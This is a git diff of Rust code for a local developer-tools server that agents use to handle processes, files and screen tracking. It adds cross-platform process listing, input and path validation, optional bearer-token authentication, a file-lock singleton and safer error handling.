@@ -347,32 +366,70 @@ pub async fn handle_process(params: Value) -> Result<Value> {
             let limit = params.get("limit").and_then(|v| v.as_u64()).unwrap_or(20) as usize;
 
             let output = tokio::task::spawn_blocking(|| {
-                std::process::Command::new("ps")
-                    .args(["-axo", "pid,pcpu,pmem,comm"])
-                    .output()
+                #[cfg(windows)]
+                {
+                    // `ps` is not available on Windows; use `tasklist` instead.
+                    std::process::Command::new("tasklist")
+                        .args(["/FO", "CSV", "/NH"])
+                        .output()
+                }
+                #[cfg(not(windows))]
+                {
+                    std::process::Command::new("ps")
+                        .args(["-axo", "pid,pcpu,pmem,comm"])
+                        .output()
+                }
             })
             .await.map_err(|e| DevToolsError::Other(format!("spawn: {e}")))?
             .map_err(|e| DevToolsError::Other(format!("ps: {e}")))?;
 
             let stdout = String::from_utf8_lossy(&output.stdout);
-            let mut procs: Vec<Value> = stdout.lines()
-                .skip(1)  // skip header
-                .filter_map(|line| {
-                    let parts: Vec<&str> = line.split_whitespace().collect();
-                    if parts.len() < 4 { return None; }
-                    let pid:  i64 = parts[0].parse().ok()?;
-                    let cpu:  f64 = parts[1].parse().ok()?;
-                    let mem:  f64 = parts[2].parse().ok()?;
-                    // `comm` may be just the executable name; join remaining parts
-                    let name = parts[3..].join(" ");
-                    Some(json!({ "pid": pid, "cpu_percent": cpu, "mem_percent": mem, "name": name }))
-                })
-                .filter(|p| {
-                    name_filter.as_ref().map_or(true, |f| {
-                        p["name"].as_str().map_or(false, |n| n.to_lowercase().contains(f.as_str()))
-                    })
+            let mut procs: Vec<Value> = {
+                #[cfg(windows)]
+                {
+                    // `tasklist /FO CSV /NH` format:
+                    // "image.exe","pid","session","#","mem_kb K"
+                    stdout.lines()
+                        .filter_map(|line| {
+                            // Strip surrounding quotes and split on `","`
+                            let line = line.trim().trim_matches('"');
+                            let parts: Vec<&str> = line.split("\",\"").collect();
+                            if parts.len() < 5 { return None; }
+                            let name = parts[0].to_string();
+                            let pid: i64 = parts[1].parse().ok()?;
+                            // mem is like "1,234 K" — strip non-digits
+                            let mem_kb: f64 = parts[4].chars()
+                                .filter(|c| c.is_ascii_digit())
+                                .collect::<String>()
+                                .parse::<f64>().ok()?;
+                            Some(json!({ "pid": pid, "cpu_percent": 0.0, "mem_percent": mem_kb / 1024.0, "name": name }))
+                        })
+                        .collect()
+                }
+                #[cfg(not(windows))]
+                {
+                    stdout.lines()
+                        .skip(1)  // skip header
+                        .filter_map(|line| {
+                            let parts: Vec<&str> = line.split_whitespace().collect();
+                            if parts.len() < 4 { return None; }
+                            let pid:  i64 = parts[0].parse().ok()?;
+                            let cpu:  f64 = parts[1].parse().ok()?;
+                            let mem:  f64 = parts[2].parse().ok()?;
+                            // `comm` may be just the executable name; join remaining parts
+                            let name = parts[3..].join(" ");
+                            Some(json!({ "pid": pid, "cpu_percent": cpu, "mem_percent": mem, "name": name }))
+                        })
+                        .collect()
+                }
+            };
+
+            // Apply name filter
+            procs.retain(|p| {
+                name_filter.as_ref().map_or(true, |f| {
+                    p["name"].as_str().map_or(false, |n| n.to_lowercase().contains(f.as_str()))
                 })
-                .collect();
+            });
 
             // Sort
             match sort_by.as_str() {
@@ -397,12 +454,16 @@ pub async fn handle_process(params: Value) -> Result<Value> {
 
             let output = tokio::task::spawn_blocking(move || {
                 if let Some(p) = pid {
+                    // `kill -s SIGNAL PID` is POSIX and correctly delivers the named signal.
                     std::process::Command::new("kill")
                         .args(["-s", signal, &p.to_string()])
                         .output()
                 } else {
+                    // `pkill -s` is a session-ID filter on Linux/macOS, NOT a signal selector.
+                    // Use `-SIGNAL` (e.g. `-KILL`, `-TERM`) to specify the signal to pkill.
+                    let sig_flag = format!("-{signal}");
                     std::process::Command::new("pkill")
-                        .args(["-s", signal, name.as_deref().unwrap_or("")])
+                        .args([sig_flag.as_str(), name.as_deref().unwrap_or("")])
                         .output()
                 }
             })
@@ -440,7 +501,15 @@ pub async fn handle_filesystem(params: Value) -> Result<Value> {
 
     // Resolve ~ in path
     let path = if path_raw.starts_with("~/") {
-        let home = std::env::var("HOME").unwrap_or_default();
+        let home = std::env::var("HOME")
+            .map_err(|_| DevToolsError::Input(
+                "HOME environment variable is not set; cannot expand '~/' path".into()
+            ))?;
+        if home.is_empty() {
+            return Err(DevToolsError::Input(
+                "HOME environment variable is empty; cannot expand '~/' path".into()
+            ));
+        }
         format!("{}{}", home, &path_raw[1..])
     } else {
         path_raw
@@ -525,11 +594,17 @@ pub async fn handle_filesystem(params: Value) -> Result<Value> {
         "copy" => {
             let dest = params.get("destination").and_then(|v| v.as_str())
                 .ok_or_else(|| DevToolsError::Input("destination required for copy mode".into()))?.to_string();
-            tokio::task::spawn_blocking(move || {
+            let status = tokio::task::spawn_blocking(move || {
                 std::process::Command::new("cp").args(["-R", &path, &dest]).status()
             })
             .await.map_err(|e| DevToolsError::Other(format!("spawn: {e}")))?
             .map_err(|e| DevToolsError::Other(format!("cp: {e}")))?;
+            if !status.success() {
+                return Err(DevToolsError::Other(format!(
+                    "cp failed with exit code {}",
+                    status.code().unwrap_or(-1),
+                )));
+            }
             Ok(json!({ "ok": true }))
         }
         "move" => {
@@ -562,9 +637,28 @@ pub async fn handle_filesystem(params: Value) -> Result<Value> {
         "search" => {
             let pattern = params.get("pattern").and_then(|v| v.as_str())
                 .ok_or_else(|| DevToolsError::Input("pattern required for search mode".into()))?.to_string();
+
+            // Validate the pattern: only allow characters safe for a filename glob.
+            // Reject path separators and null bytes to prevent injection or traversal.
+            if pattern.contains('/') || pattern.contains('\\') || pattern.contains('\0') {
+                return Err(DevToolsError::Input(
+                    "search pattern must not contain path separators or null bytes".into(),
+                ));
+            }
+
+            // Canonicalize the search root to prevent path traversal (e.g. ../../etc).
+            // We use std::fs::canonicalize which resolves symlinks and `..` components.
+            let canonical_path = tokio::task::spawn_blocking({
+                let p = path.clone();
+                move || std::fs::canonicalize(&p)
+            })
+            .await.map_err(|e| DevToolsError::Other(format!("spawn: {e}")))?
+            .map_err(|e| DevToolsError::Other(format!("canonicalize '{path}': {e}")))?;
+
+            let search_root = canonical_path.to_string_lossy().into_owned();
             let output = tokio::task::spawn_blocking(move || {
                 std::process::Command::new("find")
-                    .args([&path, "-name", &pattern])
+                    .args([&search_root, "-name", &pattern])
                     .output()
             })
             .await.map_err(|e| DevToolsError::Other(format!("spawn: {e}")))?
diff --git a/crates/tday-nativecore/src/main.rs b/crates/tday-nativecore/src/main.rs
index 7ea53b9..6bf6727 100644
--- a/crates/tday-nativecore/src/main.rs
+++ b/crates/tday-nativecore/src/main.rs
@@ -12,8 +12,9 @@ use tday_nativecore::DevToolsServer;
 
 fn main() -> Result<(), Box<dyn std::error::Error>> {
     let args: Vec<String> = std::env::args().collect();
+    let auth_token = parse_auth_token_arg(&args);
     match parse_port_arg(&args) {
-        Some(port) => start_http_server(port),
+        Some(port) => start_http_server(port, auth_token),
         None       => start_stdio_server(),
     }
 }
@@ -33,6 +34,20 @@ fn parse_port_arg(args: &[String]) -> Option<u16> {
     None
 }
 
+/// Parse `--auth-token TOKEN` or `--auth-token=TOKEN` from argv.
+fn parse_auth_token_arg(args: &[String]) -> Option<String> {
+    let mut it = args.iter();
+    while let Some(arg) = it.next() {
+        if arg == "--auth-token" {
+            return it.next().map(|v| v.clone());
+        }
+        if let Some(val) = arg.strip_prefix("--auth-token=") {
+            return Some(val.to_string());
+        }
+    }
+    None
+}
+
 // ── Stdio mode (original) ─────────────────────────────────────────────────────
 
 #[tokio::main]
@@ -74,7 +89,7 @@ async fn start_stdio_server() -> Result<(), Box<dyn std::error::Error>> {
 // ── HTTP mode (shared service for multi-agent) ────────────────────────────────
 
 #[tokio::main]
-async fn start_http_server(port: u16) -> Result<(), Box<dyn std::error::Error>> {
+async fn start_http_server(port: u16, auth_token: Option<String>) -> Result<(), Box<dyn std::error::Error>> {
     use rmcp::transport::streamable_http_server::{
         session::local::LocalSessionManager,
         StreamableHttpServerConfig,
@@ -124,7 +139,36 @@ async fn start_http_server(port: u16) -> Result<(), Box<dyn std::error::Error>>
         StreamableHttpServerConfig::default(),
     );
 
-    let router = axum::Router::new().nest_service("/mcp", service);
+    // ── Optional bearer-token authentication ──────────────────────────────────
+    // When an auth token is provided, every request must carry:
+    //   Authorization: Bearer <token>
+    // Requests without a valid token receive 401 Unauthorized.
+    let router = if let Some(token) = auth_token {
+        let token = Arc::new(token);
+        let auth_layer = axum::middleware::from_fn(move |req: axum::http::Request<axum::body::Body>, next: axum::middleware::Next| {
+            let token = token.clone();
+            async move {
+                let auth = req.headers()
+                    .get(axum::http::header::AUTHORIZATION)
+                    .and_then(|v| v.to_str().ok())
+                    .unwrap_or("");
+                let expected = format!("Bearer {}", token.as_str());
+                if auth == expected {
+                    next.run(req).await
+                } else {
+                    axum::http::Response::builder()
+                        .status(axum::http::StatusCode::UNAUTHORIZED)
+                        .body(axum::body::Body::from("Unauthorized"))
+                        .unwrap()
+                }
+            }
+        });
+        axum::Router::new()
+            .nest_service("/mcp", service)
+            .layer(auth_layer)
+    } else {
+        axum::Router::new().nest_service("/mcp", service)
+    };
 
     axum::serve(listener, router)
         .with_graceful_shutdown(async {
diff --git a/crates/tday-nativecore/src/parent_watch.rs b/crates/tday-nativecore/src/parent_watch.rs
index 4a4cc54..8d98fd4 100644
--- a/crates/tday-nativecore/src/parent_watch.rs
+++ b/crates/tday-nativecore/src/parent_watch.rs
@@ -94,7 +94,7 @@ fn macos_kqueue(ppid: u32) {
         return;
     }
 
-    let _ = std::thread::Builder::new()
+    if let Err(e) = std::thread::Builder::new()
         .name("parent-watch".into())
         .spawn(move || unsafe {
             let kq = libc::kqueue();
@@ -157,7 +157,14 @@ fn macos_kqueue(ppid: u32) {
                 tracing::info!("[parent_watch] parent PID {ppid} exited — sending SIGTERM to self");
                 libc::kill(libc::getpid(), libc::SIGTERM);
             }
-        });
+        })
+    {
+        // Thread spawn failed (resource exhaustion).  Nativecore cannot monitor
+        // its parent and will become an orphan if the parent exits without
+        // closing stdin.  Terminate immediately rather than running as a zombie.
+        tracing::error!("[parent_watch] failed to spawn parent-watch thread: {e} — exiting");
+        std::process::exit(1);
+    }
 }
 
 // ──────────────────────────────────────────────────────────────────────────────
@@ -171,7 +178,7 @@ fn windows_wait(ppid: u32) {
         return;
     }
 
-    let _ = std::thread::Builder::new()
+    if let Err(e) = std::thread::Builder::new()
         .name("parent-watch".into())
         .spawn(move || {
             use windows::Win32::Foundation::CloseHandle;
@@ -198,7 +205,11 @@ fn windows_wait(ppid: u32) {
                 let _ = TerminateProcess(self_h, 0);
                 let _ = CloseHandle(self_h);
             }
-        });
+        })
+    {
+        tracing::error!("[parent_watch] failed to spawn parent-watch thread: {e} — exiting");
+        std::process::exit(1);
+    }
 }
 
 #[cfg(target_os = "windows")]
diff --git a/crates/tday-nativecore/src/platform/macos/ax.rs b/crates/tday-nativecore/src/platform/macos/ax.rs
index 34ac07e..71ded84 100644
--- a/crates/tday-nativecore/src/platform/macos/ax.rs
+++ b/crates/tday-nativecore/src/platform/macos/ax.rs
@@ -255,11 +255,17 @@ unsafe fn snapshot_element(
     if depth < MAX_DEPTH && depth < max_depth && (*counter as usize) < MAX_ELEMENTS {
         if let Some(kids) = ax_children(el) {
             for i in 0..kids.len() {
-                let child = *kids.get_unchecked(i) as AXUIElementRef;
-                if !child.is_null() {
-                    core_foundation::base::CFRetain(child as _);
-                    let node = snapshot_element(child, refs, counter, generation, depth + 1, max_depth);
-                    core_foundation::base::CFRelease(child as _);
+                // Use safe indexing: the macOS AX API occasionally returns a CFArray
+                // whose reported length is inconsistent with its actual buffer.
+                // get_unchecked would be UB in that case; .get() returns None safely.
+                let child_ptr = match kids.get(i) {
+                    Some(ptr) => *ptr as AXUIElementRef,
+                    None => continue,
+                };
+                if !child_ptr.is_null() {
+                    core_foundation::base::CFRetain(child_ptr as _);
+                    let node = snapshot_element(child_ptr, refs, counter, generation, depth + 1, max_depth);
+                    core_foundation::base::CFRelease(child_ptr as _);
                     children.push(node);
                 }
             }
diff --git a/crates/tday-nativecore/src/singleton.rs b/crates/tday-nativecore/src/singleton.rs
index d0a0354..711f761 100644
--- a/crates/tday-nativecore/src/singleton.rs
+++ b/crates/tday-nativecore/src/singleton.rs
@@ -21,6 +21,41 @@
 use std::fs;
 use std::path::PathBuf;
 
+// ──────────────────────────────────────────────────────────────────────────────
+// File-level lock (POSIX flock / Windows LockFileEx)
+//
+// We hold the OS-level advisory lock for the entire duration of the
+// read-kill-write critical section so that two concurrently-starting
+// nativecore processes cannot both believe they have acquired the singleton.
+// ──────────────────────────────────────────────────────────────────────────────
+
+#[cfg(unix)]
+fn with_file_lock<F: FnOnce()>(path: &std::path::Path, f: F) {
+    use std::os::unix::io::AsRawFd;
+    // Open (or create) the lock file.
+    let file = match fs::OpenOptions::new().create(true).write(true).open(path) {
+        Ok(f) => f,
+        Err(e) => {
+            tracing::warn!("[singleton] could not open lock file for flock: {e}");
+            f();
+            return;
+        }
+    };
+    // Acquire exclusive advisory lock — blocks if another instance holds it.
+    let ret = unsafe { libc::flock(file.as_raw_fd(), libc::LOCK_EX) };
+    if ret == -1 {
+        tracing::warn!("[singleton] flock(LOCK_EX) failed; proceeding without lock");
+    }
+    f();
+    // Lock is released automatically when `file` is dropped (fd closed).
+}
+
+#[cfg(not(unix))]
+fn with_file_lock<F: FnOnce()>(_path: &std::path::Path, f: F) {
+    // Windows: advisory flock is not available; rely on the existing PID check.
+    f();
+}
+
 // ──────────────────────────────────────────────────────────────────────────────
 
 fn lock_path() -> PathBuf {
@@ -200,32 +235,41 @@ impl Drop for SingletonGuard {
 /// A process with a live parent belongs to a concurrent agent session and is
 /// left untouched, enabling multiple agents to run simultaneously.
 ///
+/// Uses an OS-level advisory file lock (flock on Unix) to make the
+/// read-check-kill-write sequence atomic and eliminate the TOCTOU race
+/// that would otherwise allow two processes to simultaneously believe
+/// they have acquired the lock.
+///
 /// Returns a `SingletonGuard` that removes the lock file when dropped.
 pub fn acquire() -> SingletonGuard {
     let my_pid = std::process::id();
+    let path = lock_path();
 
-    if let Some(old_pid) = read_lock_pid() {
-        if old_pid != my_pid && pid_is_alive(old_pid) {
-            if pid_is_orphan(old_pid) {
-                tracing::info!(
-                    "[singleton] orphaned tday-nativecore PID {old_pid} found — terminating"
-                );
-                terminate_pid(old_pid);
-                if pid_is_alive(old_pid) {
-                    tracing::warn!("[singleton] PID {old_pid} still alive after kill attempt");
+    with_file_lock(&path, || {
+        if let Some(old_pid) = read_lock_pid() {
+            if old_pid != my_pid && pid_is_alive(old_pid) {
+                if pid_is_orphan(old_pid) {
+                    tracing::info!(
+                        "[singleton] orphaned tday-nativecore PID {old_pid} found — terminating"
+                    );
+                    terminate_pid(old_pid);
+                    if pid_is_alive(old_pid) {
+                        tracing::warn!("[singleton] PID {old_pid} still alive after kill attempt");
+                    } else {
+                        tracing::info!("[singleton] orphan PID {old_pid} terminated");
+                    }
                 } else {
-                    tracing::info!("[singleton] orphan PID {old_pid} terminated");
+                    tracing::info!(
+                        "[singleton] PID {old_pid} is alive with active parent — leaving it \
+                         (concurrent agent session)"
+                    );
                 }
-            } else {
-                tracing::info!(
-                    "[singleton] PID {old_pid} is alive with active parent — leaving it \
-                     (concurrent agent session)"
-                );
             }
         }
-    }
 
-    write_lock_pid(my_pid);
+        write_lock_pid(my_pid);
+    });
+
     tracing::info!("[singleton] lock acquired (PID {my_pid})");
     SingletonGuard { _private: () }
 }
diff --git a/crates/tday-nativecore/src/tracking/hover_tracker.rs b/crates/tday-nativecore/src/tracking/hover_tracker.rs
index a70817e..d20df79 100644
--- a/crates/tday-nativecore/src/tracking/hover_tracker.rs
+++ b/crates/tday-nativecore/src/tracking/hover_tracker.rs
@@ -79,7 +79,7 @@ impl HoverTracker {
     }
 
     pub fn drain_events(&self) -> Vec<HoverEvent> {
-        let mut events = self.events.lock().unwrap();
+        let mut events = self.events.lock().unwrap_or_else(|e| e.into_inner());
         events.drain(..).collect()
     }
 
@@ -92,7 +92,7 @@ impl HoverTracker {
         {
             task_handle.abort();
         }
-        let mut buf = events.lock().unwrap();
+        let mut buf = events.lock().unwrap_or_else(|e| e.into_inner());
         buf.drain(..).collect()
     }
 }
@@ -179,7 +179,7 @@ pub fn start_polling(
             if start.elapsed() >= max_duration {
                 if let Some(entry) = confirmed {
                     let left_at = first_departure.unwrap_or_else(Instant::now);
-                    events.lock().unwrap().push(entry.into_event(left_at, true));
+                    events.lock().unwrap_or_else(|e| e.into_inner()).push(entry.into_event(left_at, true));
                 }
                 return;
             }
@@ -221,7 +221,7 @@ pub fn start_polling(
                 if cand.since.elapsed() >= min_dwell {
                     if let Some(prev) = confirmed.take() {
                         let departed = first_departure.unwrap_or(cand.since);
-                        events.lock().unwrap().push(prev.into_event(departed, false));
+                        events.lock().unwrap_or_else(|e| e.into_inner()).push(prev.into_event(departed, false));
                     }
                     confirmed = candidate.take();
                     first_departure = None;
diff --git a/crates/tday-nativecore/src/tracking/screen_recorder.rs b/crates/tday-nativecore/src/tracking/screen_recorder.rs
index 7e01e07..7c5b096 100644
--- a/crates/tday-nativecore/src/tracking/screen_recorder.rs
+++ b/crates/tday-nativecore/src/tracking/screen_recorder.rs
@@ -56,7 +56,7 @@ impl ScreenRecorder {
 
     #[allow(dead_code)]
     pub fn drain_frames(&self) -> Vec<RecordedFrame> {
-        let mut frames = self.frames.lock().unwrap();
+        let mut frames = self.frames.lock().unwrap_or_else(|e| e.into_inner());
         frames.drain(..).collect()
     }
 
@@ -69,7 +69,7 @@ impl ScreenRecorder {
             self.task_handle.abort();
         }
         self.cancel = CancellationToken::new();
-        let mut buf = self.frames.lock().unwrap();
+        let mut buf = self.frames.lock().unwrap_or_else(|e| e.into_inner());
         buf.drain(..).collect()
     }
 }
@@ -125,7 +125,7 @@ pub fn start_recording(
             match result {
                 Ok(Ok((frame, pid, app_name))) => {
                     app_name_cache.insert(pid, app_name);
-                    frames.lock().unwrap().push(frame);
+                    frames.lock().unwrap_or_else(|e| e.into_inner()).push(frame);
                 }
                 Ok(Err(e)) => {
                     tracing::debug!("Frame capture failed: {e}");